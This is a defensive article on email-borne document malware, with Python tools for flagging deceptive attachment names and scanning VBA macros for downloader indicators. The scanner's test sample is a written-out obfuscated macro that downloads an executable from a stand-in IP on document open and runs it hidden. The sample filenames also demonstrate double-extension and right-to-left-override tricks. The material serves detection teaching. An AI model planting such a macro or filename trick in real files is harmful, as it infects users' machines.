Since the beginning of 2019, however, these types of document-based attacks have been increasing in frequency – dramatically. In the first quarter of the year, 59% of all malicious files detected were documents, compared to 41% the prior year.
Here’s a closer look at document-based malware attacks and solutions to help detect and block them.
Highlighted Threat
Document-Based Malware – Cybercriminals use email to deliver a document containing malicious software, also known as malware. Typically, either the malware is hidden directly in the document itself or an embedded script downloads it from an external website. Common types of malware include viruses, trojans, spyware, worms and ransomware.
The Modern Framework for Malware Attacks
After decades of relying on signature-based methods, which could only be effective at stopping a malware strain once a signature was derived from it, security companies now think about malware detection by asking "What makes something malicious?" rather than "How do I detect things I know are malicious?" The focus is on attempting to detect indicators that a file might do harm before it is labeled as being harmful.
A common model used to better understand attacks is the Cyber Kill Chain, a seven-phase model of the steps most attackers take to breach a system:
· Reconnaissance - selecting targets and researching them
· Weaponization - building the attack payload, typically pairing malware and/or an exploit with a carrier such as a document
· Delivery - transmitting the weaponized payload to the target, for example as an email attachment
· Exploitation - triggering the exploit (or macro) in the delivered package so that attacker code runs on the target
· Installation - establishing persistence on the target's system
· Command and control - using that foothold to control the compromised system from outside the network
· Actions on objective - carrying out the purpose of the attack, often exfiltration of data
Most malware is sent as spam to widely circulated email lists that are sold, traded, aggregated and revised as they move through the dark web. Combo lists like those used in the ongoing sextortion scams are a good example of this sort of list aggregation and usage in action.
Once the attacker has a list of potential victims, the malware campaign (the delivery phase of the kill chain) can commence, using social engineering to get users to open an attached malicious document. Microsoft Office and Adobe file types are the most commonly used in document-based malware attacks: Word, Excel and PowerPoint files, and Acrobat (PDF) files.
Once the document is opened, either malware embedded in the document runs directly or a heavily obfuscated macro or script downloads and installs it from an external source. Since Office shows a warning bar rather than running macros automatically, the lure usually also has to persuade the user to click "Enable Content". Occasionally a link or other clickable item is used instead, but that approach is much more common in phishing attacks than in malware attacks. The macro or exploit running when the document is opened is the exploitation phase of the kill chain; the executable it downloads and runs is the installation phase.
Archive files and script files are the other two most common attachment-based distribution methods for malware. Attackers often play tricks with file extensions to confuse users into opening malicious files: a double extension such as invoice.pdf.exe appears as invoice.pdf when Windows hides known extensions, and a right-to-left override character can make the displayed name end in .pdf while the real extension is .exe.
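The extension tricks described above can be checked mechanically at the mail gateway before any content analysis runs. The following is an added example, not code from the original article or from any vendor product; the attachment names it classifies are constructed for the example, and the extension lists are an illustrative starting point rather than a complete policy.

```python
"""Attachment-name heuristics for file-extension tricks (added example)."""
import re

# Extensions Windows will execute directly on double-click (illustrative list).
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "hta", "ps1", "lnk", "msi"}
# Document extensions an attacker imitates to look harmless.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "docm", "xls", "xlsx", "xlsm",
                 "ppt", "pptx", "rtf", "txt"}
# Containers whose contents must be unpacked and inspected separately.
ARCHIVE_EXTS = {"zip", "rar", "7z", "iso", "img", "gz", "ace"}
# Unicode bidirectional controls; U+202E (RLO) reverses the displayed tail.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}


def analyze_filename(name):
    """Return the reasons an attachment name looks deceptive.

    An empty list means no extension trick was found; it says nothing about
    the file's content, which still needs static/dynamic analysis.
    """
    reasons = []
    # 1. Bidi override: "invoice\u202Efdp.exe" renders as "invoiceexe.pdf".
    if any(ch in BIDI_CONTROLS for ch in name):
        reasons.append("bidi control character in name")
    # Work on the name as the OS sees it, without the display-only controls.
    clean = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    parts = clean.lower().split(".")
    exts = parts[1:] if len(parts) > 1 else []
    true_ext = exts[-1] if exts else ""
    # 2. Double extension: "report.pdf.exe" shows as "report.pdf" when
    #    Explorer hides known extensions.
    if true_ext in EXECUTABLE_EXTS and any(e in DOCUMENT_EXTS for e in exts[:-1]):
        reasons.append("document extension masking executable ." + true_ext)
    elif true_ext in EXECUTABLE_EXTS:
        reasons.append("directly executable attachment ." + true_ext)
    # 3. A run of spaces pushes the real extension out of the visible column.
    if re.search(r"\s{5,}\.", name):
        reasons.append("long run of spaces before extension")
    # 4. Archive wrapper: the inner file type is hidden until extraction.
    if true_ext in ARCHIVE_EXTS:
        reasons.append("archive container; inspect contents")
    return reasons


# Constructed sample attachment names (not from a real campaign).
SAMPLE_NAMES = [
    "quarterly_report.docx",
    "report.pdf.exe",
    "invoice\u202efdp.exe",
    "statement                         .pdf.scr",
    "scan.zip",
]


def triage(names):
    """Map each attachment name to its list of reasons (empty = no trick)."""
    return {n: analyze_filename(n) for n in names}


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_NAMES).items():
        print(repr(name), "->", reasons or ["ok"])
```

The check is deliberately run on the raw name, including any Unicode control characters, because that is what the mail client renders; stripping the controls first would hide the RLO trick it is looking for.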
Modern malware attacks are complex and layered; the solutions designed to detect and block them are, too.
Detecting and Blocking Malware Attacks
Blacklists — Because unused IPv4 space is scarce, spammers increasingly send from their own infrastructure, and they often reuse the same IPs long enough for reputation systems to detect and blacklist them. Even with hacked sites and botnets, it's possible to temporarily block attacks by IP once a large enough volume of spam has been observed from it.
Spam Filters / Phishing-Detection Systems — While many malicious emails appear convincing, spam filters, phishing-detection systems and related security software can pick up subtle clues in headers, content and sender behaviour, and block potentially threatening messages and attachments before they reach inboxes.
Malware Detection — For emails with malicious documents attached, both static and dynamic analysis can pick up on indicators that the document is trying to download and run an executable, which no legitimate document should do. The URL of the executable can often be flagged using heuristics or threat-intelligence feeds. Obfuscation detected by static analysis (encoded strings, reversed or character-by-character assembled text in a macro) is itself a strong signal that a document is suspicious.
Advanced Firewall — If a user opens a malicious attachment or clicks a link to a drive-by download, an advanced network firewall capable of malware analysis provides a further chance to stop the attack by flagging the executable as it passes through the perimeter.
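To make the static-analysis point concrete, here is an added example of the kind of indicator scan described under Malware Detection; it is not code from the original article or from any vendor product. It runs over the extracted VBA source of a macro (as tools such as oletools' olevba would produce) and looks for the pattern that no legitimate document needs: an auto-execute entry point combined with a download or a shell launch. It also folds the cheap obfuscation tricks (Chr() chains, StrReverse, literal concatenation) so that the download URL becomes visible. Both macro listings are constructed for the example, and the host 198.51.100.23 is a documentation-range address, not a real download site.

```python
"""Static indicator scan of extracted VBA macro source (added example)."""
import re

# Indicator families a document should not need, as regexes over the
# (partially deobfuscated) macro text.
INDICATORS = {
    "auto_exec":   r"\b(AutoOpen|Auto_Open|AutoClose|Document_Open|Document_Close|Workbook_Open)\b",
    "execution":   r"\bShell\b|WScript\.Shell|ShellExecute|\.Run\b",
    "download":    r"URLDownloadToFile|MSXML2\.XMLHTTP|ServerXMLHTTP|WinHttp\.WinHttpRequest",
    "file_write":  r"ADODB\.Stream|SaveToFile|\bOpen\b.+\bFor Binary\b",
    "environ":     r"Environ\(",
    "obfuscation": r"Chr\(|ChrW\(|StrReverse\(|\bXor\b|Replace\(",
}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
EXEC_RE = re.compile(r"\.(exe|dll|scr|bat|cmd|ps1|vbs|js)$", re.IGNORECASE)


def decode_literals(src):
    """Fold cheap string tricks so URLs and COM class names become visible.

    Chr(104) & Chr(116) ... -> "ht...";  StrReverse("cba") -> "abc";
    "ab" & "cd" -> "abcd".  This is a lossy normalisation for indicator
    extraction, not a VBA interpreter.
    """
    def chr_chain(m):
        codes = re.findall(r"Chr\((\d+)\)", m.group(0))
        return '"' + "".join(chr(int(c)) for c in codes) + '"'
    out = re.sub(r"Chr\(\d+\)(?:\s*&\s*Chr\(\d+\))*", chr_chain, src)
    out = re.sub(r'StrReverse\("([^"]*)"\)', lambda m: '"' + m.group(1)[::-1] + '"', out)
    out = re.sub(r'"\s*&\s*"', "", out)  # join adjacent string literals
    return out


def scan_macro(src):
    """Return indicator hit counts, recovered URLs and a verdict for one macro."""
    decoded = decode_literals(src)
    hits = {}
    for name, pattern in INDICATORS.items():
        # Obfuscation is counted on the raw text; everything else on the decoded text.
        haystack = src if name == "obfuscation" else decoded
        found = re.findall(pattern, haystack, re.IGNORECASE)
        if found:
            hits[name] = len(found)
    urls = URL_RE.findall(decoded)
    exe_urls = [u for u in urls if EXEC_RE.search(u)]
    # Runs on open AND fetches or launches something: the downloader pattern.
    downloader = "auto_exec" in hits and ("download" in hits or "execution" in hits)
    score = sum(hits.values()) + 5 * len(exe_urls)
    if downloader or exe_urls:
        verdict = "malicious"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "no indicators"
    return {"hits": hits, "urls": urls, "executable_urls": exe_urls,
            "score": score, "verdict": verdict}


# Constructed sample: a typical obfuscated downloader macro (hypothetical host).
MALICIOUS_MACRO = r'''
Private Sub Document_Open()
    Dim sUrl As String, sPath As String
    sUrl = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & "198.51.100.23/upd/inst.exe"
    sPath = Environ("TEMP") & "\inst.exe"
    Set oHttp = CreateObject("MSXML2.XMLHTTP")
    oHttp.Open "GET", sUrl, False
    oHttp.send
    Set oStream = CreateObject("ADODB.Stream")
    oStream.Open
    oStream.Type = 1
    oStream.Write oHttp.responseBody
    oStream.SaveToFile sPath, 2
    Set oShell = CreateObject(StrReverse("llehS.tpircSW"))
    oShell.Run sPath, 0
End Sub
'''

# Constructed sample: a harmless formatting macro.
BENIGN_MACRO = r'''
Sub FormatTotals()
    Range("A1:D1").Font.Bold = True
    Columns("D").NumberFormat = "#,##0.00"
End Sub
'''

if __name__ == "__main__":
    for label, macro in (("malicious", MALICIOUS_MACRO), ("benign", BENIGN_MACRO)):
        print(label, "->", scan_macro(macro))
```

The verdict rule mirrors the article's criterion rather than relying on the score alone: an auto-execute entry point plus a download or shell launch is enough to reject the document, and a recovered URL ending in an executable extension is a ready-made indicator to pass on to the URL-reputation and firewall layers. Real macros add many more layers of obfuscation, which is why dynamic analysis in a sandbox is used alongside static checks like this one.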